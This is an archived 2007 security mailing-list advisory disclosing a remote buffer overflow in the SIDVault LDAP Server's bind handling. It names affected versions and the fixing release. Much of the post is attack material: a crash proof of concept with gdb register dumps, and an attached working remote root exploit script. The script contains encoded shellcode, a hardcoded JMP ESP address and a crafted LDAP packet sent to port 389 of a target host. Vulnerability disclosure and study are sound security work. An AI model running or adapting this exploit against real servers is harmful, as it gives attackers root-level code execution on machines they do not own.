SIDVault LDAP Server Remote Buffer Overflow

To: Full Disclosure <full-disclosure@xxxxxxxxxxxxxxxxx>, Security Tracker <bugs@xxxxxxxxxxxxxxxxxxx>, bugtraq@xxxxxxxxxxxxxxxxx
Subject: SIDVault LDAP Server Remote Buffer Overflow
From: Joxean Koret <joxeankoret@xxxxxxxx>
Date: Sun, 26 Aug 2007 02:50:11 +0200
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.es; h=Received:X-YMail-OSG:Subject:From:To:Content-Type:Date:Message-Id:Mime-Version:X-Mailer; b=qVlq0V3fZsOCyo1BpA0M+PsaeY4AO6UQZvHjBoMFAyU8epnYmz19sncYlyPkslsJqDfsACtgu3VShhs4GByD8YgT9QNjtjpfPrsjir/K6ZKMyRJ2PtlS0C0RSlujoHdV+upIPwjxafQ6vEov4pLBtFoH3kSfvBHL1iVBDNso1to= ;
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

SIDVault LDAP Server Remote Buffer Overflow
===========================================

Product Description:

SIDVault LDAP Server for Win32 and GNU/Linux

SIDVault is a Simple Integration Database, allowing easy management and
installations with high performance LDAP v3 server. It supports any
number of schemas, easy to add/modify existing schemas, integrated web
based user access, and fast browser based administration tools. Supports
all relevant RFC protocols LDAP v2, LDAP v3, HTTP, ILS. 

Vulnerable versions:

        Win32 2.0e
        Linux 2.0d

Vulnerability Details:

The login mechanism is prone to multiple buffer-overflow vulnerabilities
because it fails to adequately bounds-check user-supplied input before
copying it to an insufficiently sized buffer.

Successfully exploiting the issue will allow an attacker to execute
arbitrary code with root or SYSTEM-level privileges depending on the
operative system target. Failed exploit attempts will result in a
denial-of-service condition. 

Proof of concept:

# gdb /usr/local/sidvault/sidvault
(...)
(gdb) r -run

In another terminal:

$ cat poc.py
import ldap

l = ldap.open("localhost")
l.simple_bind("dc=" + "A"*4099, "B"*256)
$ ./poc.py

In the first terminal:

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1226736720 (LWP 5942)]
0x41414141 in ?? ()
(gdb) where
#0  0x41414141 in ?? ()
#1  0x41414141 in ?? ()
(...)
Quit
(gdb) i r
eax            0x8202c48        136326216
ecx            0x0      0
edx            0xb6e164df       -1226742561
ebx            0x41414141       1094795585
esp            0xb6e16500       0xb6e16500
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141

Exploit:

An exploit for Debian based distributions which spawns a remote root
terminal has been writen. See the attached exploit.

Patch information:

The problem is solved in the latest version (2.0f) which is available in
the vendor's website at http://www.alphacentauri.co.nz/.

Thanks:

Thanks to Lynden Sherriff from Alphacentauri Ltd., he where very kind
and professional.

Disclaimer:

The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind. 

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.

Contact:

Joxean Koret - joxeankoret[at]yahoo[dot]es

#!/usr/bin/python

"""
Alpha Centauri Software SIDVault LDAP Server remote root exploit (0days)
"""

import sys
import socket

sc  = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
sc += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
sc += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
sc += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
sc += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x41\x33\x4b\x4d\x43\x35"
sc += "\x43\x44\x43\x45\x4c\x56\x44\x30\x4c\x46\x48\x56\x4a\x45\x49\x49"
sc += "\x49\x38\x41\x4e\x4d\x4c\x42\x58\x48\x59\x43\x44\x44\x55\x48\x36"
sc += "\x4a\x36\x41\x31\x4e\x35\x48\x46\x43\x35\x49\x58\x41\x4e\x4c\x56"
sc += "\x48\x56\x4a\x55\x42\x45\x41\x55\x48\x35\x49\x48\x41\x4e\x4d\x4c"
sc += "\x42\x48\x42\x4b\x48\x46\x41\x4d\x43\x4e\x4d\x4c\x42\x48\x44\x35"
sc += "\x44\x55\x48\x45\x43\x54\x49\x38\x41\x4e\x42\x4b\x48\x36\x4d\x4c"
sc += "\x42\x38\x43\x39\x4c\x46\x44\x30\x49\x55\x42\x4b\x4f\x43\x4d\x4c"
sc += "\x42\x38\x49\x54\x49\x47\x49\x4f\x42\x4b\x4b\x50\x44\x35\x4a\x46"
sc += "\x4f\x32\x4f\x42\x43\x57\x4a\x46\x4a\x36\x4f\x32\x44\x56\x49\x36"
sc += "\x50\x46\x49\x38\x43\x4e\x44\x45\x43\x35\x49\x58\x41\x4e\x4d\x4c"
sc += "\x42\x48\x5a"

#
# The address we will use is 0xffffe777 (JMP ESP in Ubuntu's linux-gate.so)
#
addr = "\x77\xe7\xff\xff"

theLine = '\x90'*2076 + addr+ '\x90'*(2019-len(sc)) + sc

pkt  = '0\x82\x10/\x02\x01\x01c\x82\x10(\x04\x82\x10\x06dc='
pkt += theLine
pkt += 
'\n\x01\x02\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0bobjectClass0\x00'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 389))
s.send(pkt)
s.close()

Attachment: signature.asc
Description: This is a digitally signed message part

Follow-Ups:
- EnterpriseDB Advanced Server 8.2 Unitialized Pointer
  - From: Joxean Koret

Prev by Date: n.runs-SA-2007.027 - Sophos Antivirus UPX parsing Arbitrary CodeExecution Advisory
Next by Date: [SECURITY] [DSA 1358-1] New asterisk packages fix several vulnerabilities
Previous by thread: Re: [Sec] Re: [Full-disclosure] n.runs-SA-2007.027 - Sophos Antivirus UPX parsing Arbitrary CodeExecution Advisory
Next by thread: EnterpriseDB Advanced Server 8.2 Unitialized Pointer
Index(es):
- Date
- Thread